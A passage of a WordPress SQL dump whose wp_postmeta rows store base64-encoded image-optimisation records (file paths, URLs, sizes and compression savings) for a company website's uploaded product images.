XC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLWUxNDczMjU3NjMyMjczLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczOTQwLCJpZCI6MTI3MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy1lMTQ3MzI1NzYzMjI3My0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLWUxNDczMjU3NjMyMjczLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctZTE0NzMyNTc2MzIyNzMtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzM5NDMsImlkIjoxMjcxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLWUxNDczMjU3NjMyMjczLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctZTE0NzMyNTc2MzIyNzMtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy1lMTQ3MzI1NzYzMjI3My0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3Mzk0NSwiaWQiOjEyNzF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctZTE0NzMyNTc2MzIyNzMtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy1lMTQ3MzI1NzYzMjI3My01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLWUxNDczMjU3NjMyMjczLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczOTQ5LCJpZCI6MTI3MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLWUxNDczMjU3NjMyMjczLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctZTE0NzMyNTc2MzIyNzMtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy1lMTQ3MzI1NzYzMjI3My0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3Mzk1MSwiaWQiOjEyNzF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy1lMTQ3MzI1NzYzMjI3My0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLWUxNDczMjU3NjMyMjczLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctZTE0NzMyNTc2MzIyNzMtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzM5NTMsImlkIjoxMjcxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctZTE0NzMyNTc2MzIyNzMtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy1lMTQ3MzI1NzYzMjI3My0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLWUxNDczMjU3NjMyMjczLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczOTU2LCJpZCI6MTI3MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLWUxNDczMjU3NjMyMjczLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctZTE0NzMyNTc2MzIyNzMtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy1lMTQ3MzI1NzYzMjI3My0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3Mzk1OCwiaWQiOjEyNzF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy1lMTQ3MzI1NzYzMjI3My0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLWUxNDczMjU3NjMyMjczLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctZTE0NzMyNTc2MzIyNzMtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzM5NjEsImlkIjoxMjcxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctZTE0NzMyNTc2MzIyNzMtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy1lMTQ3MzI1NzYzMjI3My00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLWUxNDczMjU3NjMyMjczLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczOTY0LCJpZCI6MTI3MX1d'); 
INSERT INTO `wp_postmeta` VALUES (29639, 1264, 'wpfc_optimisation_reduction', '14805'); 
INSERT INTO `wp_postmeta` VALUES (29640, 1264, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zb2x2ZW50LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zb2x2ZW50LmpwZyIsIndpZHRoIjo3NTAwLCJoZWlnaHQiOjUwMDAsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NzM5NjksImlkIjoiMTI2NCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zb2x2ZW50LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zb2x2ZW50LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC1zb2x2ZW50LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo4NDQsInRpbWUiOjE0ODM1NzM5NzIsImlkIjoxMjY0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc29sdmVudC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc29sdmVudC04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3ZlcnRyZWwtc29sdmVudC04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MTY5NSwidGltZSI6MTQ4MzU3Mzk3NywiaWQiOjEyNjR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zb2x2ZW50LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zb2x2ZW50LTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC1zb2x2ZW50LTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoxNzI5LCJ0aW1lIjoxNDgzNTczOTgxLCJpZCI6MTI2NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNvbHZlbnQtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zb2x2ZW50LTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC92ZXJ0cmVsLXNvbHZlbnQtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MzY1MCwidGltZSI6MTQ4MzU3Mzk4NiwiaWQiOjEyNjR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zb2x2ZW50LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zb2x2ZW50LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC1zb2x2ZW50LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo2ODYsInRpbWUiOjE0ODM1NzM5ODksImlkIjoxMjY0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc29sdmVudC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc29sdmVudC0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3ZlcnRyZWwtc29sdmVudC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NTEyLCJ0aW1lIjoxNDgzNTczOTkzLCJpZCI6MTI2NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNvbHZlbnQtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNvbHZlbnQtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC92ZXJ0cmVsLXNvbHZlbnQtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjYxMSwidGltZSI6MTQ4MzU3Mzk5NiwiaWQiOjEyNjR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zb2x2ZW50LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zb2x2ZW50LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC1zb2x2ZW50LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxMjc2LCJ0aW1lIjoxNDgzNTc0MDAwLCJpZCI6MTI2NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc29sdmVudC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc29sdmVudC0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3ZlcnRyZWwtc29sdmVudC0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6NDM3LCJ0aW1lIjoxNDgzNTc0MDAzLCJpZCI6MTI2NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc29sdmVudC0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc29sdmVudC0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3ZlcnRyZWwtc29sdmVudC0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NDU2LCJ0aW1lIjoxNDgzNTc0MDA3LCJpZCI6MTI2NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc29sdmVudC0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc29sdmVudC0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3ZlcnRyZWwtc29sdmVudC0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6NTMxLCJ0aW1lIjoxNDgzNTc0MDEwLCJpZCI6MTI2NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc29sdmVudC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc29sdmVudC0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3ZlcnRyZWwtc29sdmVudC0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NjY1LCJ0aW1lIjoxNDgzNTc0MDE0LCJpZCI6MTI2NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc29sdmVudC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc29sdmVudC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3ZlcnRyZWwtc29sdmVudC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NzYxLCJ0aW1lIjoxNDgzNTc0MDE3LCJpZCI6MTI2NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc29sdmVudC00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc29sdmVudC00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3ZlcnRyZWwtc29sdmVudC00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6OTUyLCJ0aW1lIjoxNDgzNTc0MDIxLCJpZCI6MTI2NH1d'); 
INSERT INTO `wp_postmeta` VALUES (29641, 1261, 'wpfc_optimisation_reduction', '1926'); 
INSERT INTO `wp_postmeta` VALUES (29642, 1261, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWxvZ28tZTE0NzMxODY5ODg1NTEuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24tbG9nby1lMTQ3MzE4Njk4ODU1MS5qcGciLCJ3aWR0aCI6MjQwLCJoZWlnaHQiOjk5LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvaGV4aW9uLWxvZ28tZTE0NzMxODY5ODg1NTEuanBnIiwicmVkdWN0aW9uIjo4MDksInRpbWUiOjE0ODM1NzQwMjgsImlkIjoiMTI2MSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWxvZ28tZTE0NzMxODY5ODg1NTEtMjAweDk5LmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6OTksInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWxvZ28tZTE0NzMxODY5ODg1NTEtMjAweDk5LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2hleGlvbi1sb2dvLWUxNDczMTg2OTg4NTUxLTIwMHg5OS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQwMzAsImlkIjoxMjYxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1sb2dvLWUxNDczMTg2O